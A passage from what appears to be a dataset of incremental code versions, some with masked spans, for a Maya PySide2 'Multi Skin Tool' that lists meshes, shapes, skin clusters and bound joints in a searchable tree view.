[]))\n meshes = 
set([x.getParent() for x in meshesShapes if pm.\n objectType(x) == 'mesh'])\n return meshes\n elif filter == 'None':\n return None\n\n @staticmethod\n def test():\n print('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n \"\"\"\n result = []\n if not pm.objExists(_transform):\n return result\n validList = mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) +\n '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster): all_binds_jnts})\n return bindJoints_dic\n\n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type='mesh', ni=1)\n transformList = list(set(pm.listRelatives(shapesList, parent=True)))\n transformList.sort()\n return transformList\n\n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform): all_shapes})\n return shapes_dic\n\n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes:\n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape): incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape): 'None'})\n else:\n cluster_dic.update({str(shape): skinCluster})\n else:\n cluster_dic.update({str(shape): 'None'})\n except TypeError:\n cluster_dic.update({str(shape): 'None'})\n return cluster_dic\n\n\ndef showUI(dialog=False):\n if dialog:\n MultiSkin_UI.show_dialog()\n else:\n global tools_cw_ui\n try:\n tools_cw_ui.deleteLater()\n except:\n pass\n tools_cw_ui = MultiSkin_UI()\n tools_cw_ui.show()\n",
"step-4": "<mask token>\n\n\ndef undo(func):\n \"\"\" \n Puts the wrapped `func` into a single Maya Undo action, then\n undoes it when the function enters the finally: block\n from schworer Github\n \"\"\"\n\n @wraps(func)\n def _undofunc(*args, **kwargs):\n try:\n mc.undoInfo(ock=True)\n return func(*args, **kwargs)\n finally:\n mc.undoInfo(cck=True)\n return _undofunc\n\n\n<mask token>\n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n __dialog = None\n\n @classmethod\n def show_dialog(cls):\n if cls.__dialog is None:\n cls.__dialog = cls()\n else:\n cls.__dialog.raise_()\n cls.__dialog.show()\n\n def __init__(self, parent=None):\n super(MultiSkin_UI, self).__init__(parent=parent)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.setObjectName('multi skin ui')\n self.starting_height = 500\n self.starting_width = 390\n self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))\n self.setWindowFlags(QtCore.Qt.Tool)\n self.setMinimumWidth(self.starting_width)\n self.resize(self.starting_width, self.starting_height)\n self.mainBox = QtWidgets.QVBoxLayout()\n self.mainBox.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout = QtWidgets.QScrollArea()\n self.mainBox.addWidget(self.scroll_layout)\n self.setLayout(self.mainBox)\n self.scroll_layout.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout.setWidgetResizable(True)\n self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)\n self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)\n self.scroll_widget = QtWidgets.QWidget()\n self.scroll_layout.setWidget(self.scroll_widget)\n self.main_layout = QtWidgets.QVBoxLayout()\n self.main_layout.setContentsMargins(*([5] * 4))\n self.main_layout.setSpacing(2)\n self.setLayout(self.main_layout)\n self.scroll_widget.setLayout(self.main_layout)\n self.widgetsAndLayouts()\n self.create_Button()\n self.buildMainLayout()\n\n def widgetsAndLayouts(self):\n\n def addLine():\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,\n bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text\n self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]\n self.vlayout = {}\n for layoutName, margins in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [\n 'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]\n self.hlayout = {}\n for layoutName, margins in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar)\n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n 
self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.\n ExtendedSelection)\n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = QtWidgets.QTreeWidgetItem(['Geometries'])\n self.meshTreeWidget.setHeaderItem(header)\n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged.connect(self.\n singleClickedAction)\n self.refreshQtree()\n\n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,\n pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],\n '', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],\n '', self.hlayout['buttonsOptions'], '', 30], ['Close All', self\n .closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[\n 'buttonsOptions'], '', 30]]\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:\n self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction)\n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord\n .split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n _optionsExpandAll = self.buttons['Expand All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda : self.\n expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.\n expandTree('skin cluster'))\n _optionsCloseAll = self.buttons['Close All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda : self.\n closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.\n closeTree('skin cluster'))\n\n def buildMainLayout(self):\n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n\n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n\n def searchBarEdited(self):\n matchCase = bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(' ')\n else:\n query_words = str(query).lower().split(' ')\n query_words = filter(None, query_words)\n scoreList = {}\n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n 
score += 1\n elif query_word in item.lower():\n score += 1\n scoreList[item] = score\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(\n query_words)]\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n self.meshTreeWidget.clear()\n self.populateQTree(sorted_matches_string)\n\n def populateQTree(self, filterList):\n self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(\n item)]) for item in filterList]\n [root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]\n [root.setExpanded(True) for root in self.roots]\n self.QtShapes = []\n shape_dic = self.getAllShapes(self.getAllMeshes())\n QTroots_dic = {}\n for root in self.roots:\n try:\n QTroots_dic.update({root: shape_dic[root.text(0)]})\n except KeyError:\n pass\n for QTroot, shapesList in QTroots_dic.items():\n [QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in\n shapesList]\n child_count = QTroot.childCount()\n children = [QTroot.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in\n children]\n [child.setExpanded(True) for child in children]\n [self.QtShapes.append(child) for child in children]\n self.QTClusters = []\n cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))\n QTshape_dic = {}\n for shape in self.QtShapes:\n QTshape_dic.update({shape: cluster_dic[shape.text(0)]})\n for QTshape, clusterList in QTshape_dic.items():\n if clusterList == 'None':\n pass\n else:\n QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])\n child_count = QTshape.childCount()\n children = [QTshape.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in\n children]\n [self.QTClusters.append(child) for child in children]\n bindJoints_dic = self.getBindJointsFromCluster([x for x in\n cluster_dic.values() if x != 'None'])\n QTcluster_dic = {}\n for cluster in self.QTClusters:\n QTcluster_dic.update({cluster: bindJoints_dic[cluster.text(0)]})\n for QTCluster, jointList in QTcluster_dic.items():\n [QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in\n jointList]\n child_count = QTCluster.childCount()\n children = [QTCluster.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in\n children]\n\n def closeTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(False) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(False) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(False) for sclus in self.QTClusters]\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n\n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n\n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n\n def filterMeshes(self, filter='all'):\n 
\"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter == 'all':\n return self.getAllMeshes()\n elif filter == 'skinClusters':\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for\n c in clusters], []))\n meshes = set([x.getParent() for x in meshesShapes if pm.\n objectType(x) == 'mesh'])\n return meshes\n elif filter == 'None':\n return None\n\n @staticmethod\n def test():\n print('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n \"\"\"\n result = []\n if not pm.objExists(_transform):\n return result\n validList = mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) +\n '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster): all_binds_jnts})\n return bindJoints_dic\n\n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type='mesh', ni=1)\n transformList = list(set(pm.listRelatives(shapesList, parent=True)))\n transformList.sort()\n return transformList\n\n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform): all_shapes})\n return shapes_dic\n\n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes:\n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape): incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape): 'None'})\n else:\n cluster_dic.update({str(shape): skinCluster})\n else:\n cluster_dic.update({str(shape): 'None'})\n except TypeError:\n cluster_dic.update({str(shape): 'None'})\n return cluster_dic\n\n\ndef showUI(dialog=False):\n if dialog:\n MultiSkin_UI.show_dialog()\n else:\n global tools_cw_ui\n try:\n tools_cw_ui.deleteLater()\n except:\n pass\n tools_cw_ui = MultiSkin_UI()\n tools_cw_ui.show()\n",
"step-5": "from functools import wraps\n\nimport maya.cmds as mc\nimport maya.mel as mel\nimport pymel.core as pm\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nimport adb_core.Class__multi_skin as ms\nimport adbrower\nfrom CollDict import pysideColorDic as pyQtDic\nfrom maya.app.general.mayaMixin import MayaQWidgetDockableMixin\nimport adb_tools.adb_pyQt.Class__rightClickCustom as adbRC\nfrom maya_script import Adbrower\n\nadb = adbrower.Adbrower()\n\nVERSION = 1.0\n\nPATH_WINDOW = Adbrower.PATH_WINDOW_INIT + 'AppData/Roaming'\nPATH_LINUX = Adbrower.PATH_LINUX_INIT\nFOLDER_NAME = Adbrower.FOLDER_NAME_INIT\nICONS_FOLDER = Adbrower.ICONS_FOLDER_INIT\n\nYELLOW = '#ffe100'\nORANGE = '#fd651d'\nGREEN = '#597A59'\nDARKRED = '#745a54'\n\ndef undo(func):\n ''' \n Puts the wrapped `func` into a single Maya Undo action, then\n undoes it when the function enters the finally: block\n from schworer Github\n '''\n @wraps(func)\n def _undofunc(*args, **kwargs):\n try:\n # start an undo chunk\n mc.undoInfo(ock=True)\n return func(*args, **kwargs)\n finally:\n # after calling the func, end the undo chunk\n mc.undoInfo(cck=True)\n return _undofunc\n\n\ndef flatList(ori_list=''):\n \"\"\"\n Flatten a list\n \"\"\"\n flat_list = []\n for item in ori_list:\n if isinstance(item, list):\n for sub_item in item:\n flat_list.append(sub_item)\n else:\n flat_list.append(item)\n return flat_list\n\n#-----------------------------------\n# CLASS\n#----------------------------------- \n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n __dialog = None\n \n @classmethod\n def show_dialog(cls):\n if cls.__dialog is None:\n cls.__dialog = cls()\n else:\n cls.__dialog.raise_() \n cls.__dialog.show()\n \n def __init__(self,parent=None): \n super(MultiSkin_UI, self).__init__(parent=parent)\n \n self.meshTreeWidget=QtWidgets.QTreeWidget()\n \n self.setObjectName('multi skin ui')\n self.starting_height = 500\n self.starting_width = 390\n self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))\n self.setWindowFlags(QtCore.Qt.Tool)\n self.setMinimumWidth(self.starting_width)\n self.resize(self.starting_width, self.starting_height)\n \n # -----------------------------\n # --- Create scrollArea\n\n self.mainBox = QtWidgets.QVBoxLayout()\n self.mainBox.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout = QtWidgets.QScrollArea()\n\n self.mainBox.addWidget(self.scroll_layout)\n self.setLayout(self.mainBox)\n self.scroll_layout.setContentsMargins(0, 0, 0, 0)\n\n self.scroll_layout.setWidgetResizable(True)\n self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)\n self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)\n\n self.scroll_widget = QtWidgets.QWidget()\n self.scroll_layout.setWidget(self.scroll_widget) \n \n # -----------------------------\n # --- Main Layout\n\n self.main_layout = QtWidgets.QVBoxLayout()\n self.main_layout.setContentsMargins(*[5] * 4)\n self.main_layout.setSpacing(2)\n self.setLayout(self.main_layout)\n\n self.scroll_widget.setLayout(self.main_layout)\n self.widgetsAndLayouts()\n self.create_Button()\n self.buildMainLayout()\n\n\n def widgetsAndLayouts(self):\n\n # --------- Predefine widgets\n\n def addLine():\n line = QtWidgets. 
QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30, bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text \n \n # ------------------------------\n #--------- Layouts\n\n self.vLayoutAndFunctions = [\n # name, margins\n ['treeWidget', [1, 1, 1, 1]],\n ]\n self.vlayout = {}\n for layoutName, margins, in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3],) \n \n self.hLayoutAndFunctions = [\n # name, margins\n ['filterOptions', [1, 1, 1, 1]],\n ['buttonsOptions', [1, 1, 1, 1]],\n ['searchBarWidget', [1, 1, 1, 1]],\n ]\n self.hlayout = {}\n for layoutName, margins, in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3],) \n \n # ------------------------------\n # --------- QLINE EDIT WIDGET\n\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar) \n \n # ------------------------------\n # --------- CHECKBOX WIDGET\n \n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n \n # ------------------------------\n # --------- RADIO BUTTON WIDGET\n \n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n \n # ------------------------------\n # --------- TREE LIST WIDGET\n\n self.meshTreeWidget=QtWidgets.QTreeWidget()\n\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.ExtendedSelection)\n \n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = QtWidgets.QTreeWidgetItem([\"Geometries\"])\n self.meshTreeWidget.setHeaderItem(header)\n \n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged .connect(self.singleClickedAction)\n \n self.refreshQtree()\n \n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [\n # name, function , group number, labelColor, backgroundColor, layout, layout_coordinate width\n ['Show Selected', self.showSelected, 0, pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'], '', 30],\n ['Refresh', self.refreshQtree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic['colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n \n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['buttonsOptions'], '', 30],\n ['Close All', self.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['buttonsOptions'], '', 30],\n ]\n\n # Build Buttons\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width, in self.buttonAndFunctions:\n self.buttons[buttonName] = 
adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction) \n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord.split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n\n # add Right Clicked Options\n _optionsExpandAll = self.buttons['Expand All'].addButtonActions(['Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda:self.expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda:self.expandTree('skin cluster'))\n \n _optionsCloseAll = self.buttons['Close All'].addButtonActions(['Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda:self.closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda:self.closeTree('skin cluster'))\n\n\n def buildMainLayout(self):\n # ------------------------------\n # --------- BUILD MAIN LAYOUT \n \n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n \n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n\n# ==================================\n# SLOTS\n# ================================== \n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n \n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n \n def searchBarEdited(self):\n matchCase=bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(\" \")\n else:\n query_words = str(query).lower().split(\" \")\n query_words = filter(None, query_words)\n scoreList = {}\n \n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n score += 1\n else:\n if query_word in item.lower():\n score += 1\n scoreList[item] = score\n\n # If user enter more than one words, get only result with a score at least equal to the number of words in the query\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(query_words)]\n \n # Sort matches by score\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n \n self.meshTreeWidget.clear()\n self.populateQTree(sorted_matches_string)\n \n\n def populateQTree(self, filterList):\n # Meshes\n # ----------------------\n \n self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(item)]) for item in filterList]\n [root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]\n [root.setExpanded(True) for root in self.roots]\n \n # Shapes\n # ----------------------\n self.QtShapes = []\n shape_dic = self.getAllShapes(self.getAllMeshes())\n QTroots_dic = {} # Keys are Qtree object\n for root in self.roots:\n try:\n QTroots_dic.update({root:shape_dic[root.text(0)]})\n except KeyError:\n pass\n \n # added the shapes under there mesh\n for QTroot, shapesList in QTroots_dic.items():\n [QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for 
shape in shapesList]\n \n # changed their color\n child_count=QTroot.childCount()\n children=[QTroot.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for child in children] \n [child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in children] \n [child.setExpanded(True) for child in children] \n [self.QtShapes.append(child) for child in children]\n \n # skinClusters\n # ----------------------\n self.QTClusters = [] \n \n cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))\n QTshape_dic = {}\n for shape in self.QtShapes:\n QTshape_dic.update({shape:cluster_dic[shape.text(0)]})\n \n # added the skinCluster under there shape\n for QTshape, clusterList in QTshape_dic.items():\n if clusterList == 'None':\n pass\n else:\n QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)]) \n \n # changed their color\n child_count=QTshape.childCount()\n children=[QTshape.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for child in children] \n [child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in children] \n [self.QTClusters.append(child) for child in children] \n \n # Joints\n # ---------------------- \n bindJoints_dic = self.getBindJointsFromCluster([x for x in cluster_dic.values() if x != 'None'])\n \n QTcluster_dic = {}\n for cluster in self.QTClusters:\n QTcluster_dic.update({cluster:bindJoints_dic[cluster.text(0)]})\n \n for QTCluster, jointList in QTcluster_dic.items():\n [QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in jointList]\n \n # changed their color\n child_count=QTCluster.childCount()\n children=[QTCluster.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for child in children] \n [child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in children] \n \n def closeTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(False) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(False) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(False) for sclus in self.QTClusters]\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n \n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n \n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n \n def filterMeshes(self, filter = 'all'):\n \"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter =='all':\n return self.getAllMeshes()\n\n elif filter == \"skinClusters\":\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for c in clusters], []))\n meshes = set([x.getParent() for x in meshesShapes if pm.objectType(x) == 'mesh'])\n return meshes\n \n elif filter == 'None':\n return None\n \n \n# ==================================\n# STATIC METHOD\n# ================================== \n \n @staticmethod\n def test():\n print ('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n 
